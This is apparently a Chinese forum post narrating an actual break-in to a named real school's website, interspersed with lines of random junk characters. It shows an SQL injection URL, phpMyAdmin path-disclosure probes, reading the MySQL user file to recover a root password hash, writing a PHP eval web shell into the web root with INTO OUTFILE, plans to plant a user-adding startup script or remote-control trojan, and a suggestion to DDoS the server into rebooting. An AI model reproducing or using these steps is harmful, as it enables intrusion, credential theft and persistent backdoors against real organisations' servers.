友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
* j4 S8 P  Z1 y


- X$ I  C% M* F+ R" b5 h0 X5 q常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
0 Y3 v" [3 J' k) z1 w
那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
8 _* H8 A2 o% e* _3 z2./phpMyAdmin/phpinfo.php  
3./load_file()  
% c5 C( Y3 x5 ]1 ?5 C3 E4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
5 Z; `; {- E! u3 v5 S  V7 l7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

均不行...........................

/ n* N! W" i9 j$ E: ]8 r御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
( c6 W" A; s5 v2 S
权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
( w# ?3 Z4 N, i
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
+ F$ d6 a0 I, Z4 B9 V
, N/ {: i' K/ v5 X! @) m; c敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

( L$ a5 s6 P, j$ a% [http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
! H8 c2 Y: L: M$ O
8 h+ _" i# X5 ]9 W# P自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

# ]+ c' F" u# c9 \! K. V; M8 f17---- r(0072)
; B! W" p$ Z( N' [; ^* t4 C, f18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
22---- 8(0038)
23---- 2(0032)
6 A+ w8 {3 j$ d24---- E(0045)
25---- 1(0031)
26---- C(0043)
4 L& `2 l; I, f. n% r% H27---- 5(0035)
% {' T: @7 c3 ~0 C0 _6 C0 t: X5 B28---- 8(0038)
29---- 2(0032)
+ j& |1 D# i7 N1 Q) J30---- 8(0038)
* c. m' s8 F/ U( K31---- A(0041)
32---- 9(0039)
1 W1 Y2 @2 {" a  L- |, J8 n' u" [2 }33---- B(0042)
" u4 t, V& p+ W! D. B, S5 R3 w34---- 5(0035)
6 @" V& X$ o1 \& U: P35---- 4(0034)
36---- 8(0038)
* k5 B. T! a* r37---- 6(0036)
& N' G" ?( _2 ]$ R- S* H38---- 4(0034)
8 v5 L" e; U6 d  `; E- \39---- 9(0039)
) O4 ~% {/ C' u* C5 r7 `$ G2 I40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
/ V  f& Z  e) X; p% t0 t% a43---- 3(0033)
, D, Y/ q' K% q+ M! K/ g. f+ ?44---- 5(0035)
45---- 9(0039)
' h. ^8 Y/ i( X6 T# M% L. Z46---- 8(0038)
6 U# T  |2 t+ d. w6 P+ d" s0 P47---- F(0046)
. J$ J6 ~1 z- W7 F' q* [% v48---- F(0046)
49---- 4(0034)
50---- F(0046)
% g  V7 C! N; `! G- I; J51---- 0(0030)
1 U  I8 ?, r' K# i/ m- D52---- 3(0033)
53---- 2(0032)
54---- A(0041)
55---- 4(0034)
: }4 Y& ~' ]" ~/ U/ U! c56---- A(0041)
57---- B(0042)
58---- *(0044)
59---- *(0035)
; Q6 X1 ^5 z! H6 U8 V60---- *(0041)
61---- *0032)

: ^2 }& Y' W( @4 D9 {! s& S解密后成功登陆phpmyamin
                          
8 `5 [3 A5 B! H
                             
' ]$ x+ z0 g: b2 `: m8 ~. k$ f3 n! ]7 H
找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
; A/ S0 v$ P! N0 l. s( G
$ [; L# _# Z: H: ]成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................
3 ]4 U* F$ V0 m# U! f: ~0 c2 u/ ~
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
7 p7 g4 n5 e( Q4 j3 a- b4 B) O5 S0 [注释     管理员对计算机/域有不受限制的完全访问权

$ ~, D. x6 q+ \, E4 a6 N

成员

-------------------------------------------------------------------------------
admin
Administrator
slipper$
sqluser
命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

) o. B( y; O1 ~+ V6 b; `9 h6 m0 t, cddos服务器重启，不然就只能坐等服务器重启了...............................

      

angel